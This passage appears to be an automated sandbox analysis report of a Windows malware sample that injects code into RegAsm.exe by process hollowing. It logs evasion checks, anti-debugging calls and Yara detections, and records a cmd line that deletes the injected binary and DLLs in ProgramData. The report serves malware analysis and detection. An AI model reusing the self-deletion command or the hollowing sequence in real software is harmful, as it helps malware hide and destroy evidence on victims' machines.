Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050E877 FindFirstFileExW, | 0_2_0050E877 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_0050EC61 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin |
Source: Amcache.hve.8.dr | Binary or memory string: VMware, Inc. |
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.8.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.8.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.8.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.8.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.8.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.sys |
Source: Amcache.hve.8.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.8.dr | Binary or memory string: \driver\vmci,\driver\pci |
Source: Amcache.hve.8.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1 |
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.8.dr | Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware |
Source: Amcache.hve.8.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.8.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.8.dr | Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.8.dr | Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.8.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_0041917C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 1_2_0041917C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505E5D mov eax, dword ptr fs:[00000030h] | 0_2_00505E5D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505CF9 mov eax, dword ptr fs:[00000030h] | 0_2_00505CF9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505CB6 mov eax, dword ptr fs:[00000030h] | 0_2_00505CB6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004FFD5B mov ecx, dword ptr fs:[00000030h] | 0_2_004FFD5B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505D3C mov eax, dword ptr fs:[00000030h] | 0_2_00505D3C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505D97 mov eax, dword ptr fs:[00000030h] | 0_2_00505D97 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505EE5 mov eax, dword ptr fs:[00000030h] | 0_2_00505EE5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505EA1 mov eax, dword ptr fs:[00000030h] | 0_2_00505EA1 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505F16 mov eax, dword ptr fs:[00000030h] | 0_2_00505F16 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00415DB0 mov eax, dword ptr fs:[00000030h] | 1_2_00415DB0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8844 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_004C8844 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004D6B07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004D6B07 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8CC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004C8CC0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8E50 SetUnhandledExceptionFilter, | 0_2_004C8E50 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00419DB7 SetUnhandledExceptionFilter, | 1_2_00419DB7 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 1_2_00417B3E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_004173CD |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00E1018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, | 0_2_00E1018D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41B000 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 636000 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E15008 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoEx,FormatMessageA, | 0_2_004A624D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW, | 0_2_00512ADE |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504C2D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512DE9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512D80 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504D84 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504DB9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504DBE |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512E84 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 0_2_00512F0F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_00513162 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 0_2_0051328B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoEx, | 0_2_004C72A6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_00513391 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 0_2_00513460 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_005056EB |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA, | 1_2_00414560 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8B95 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_004C8B95 |
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |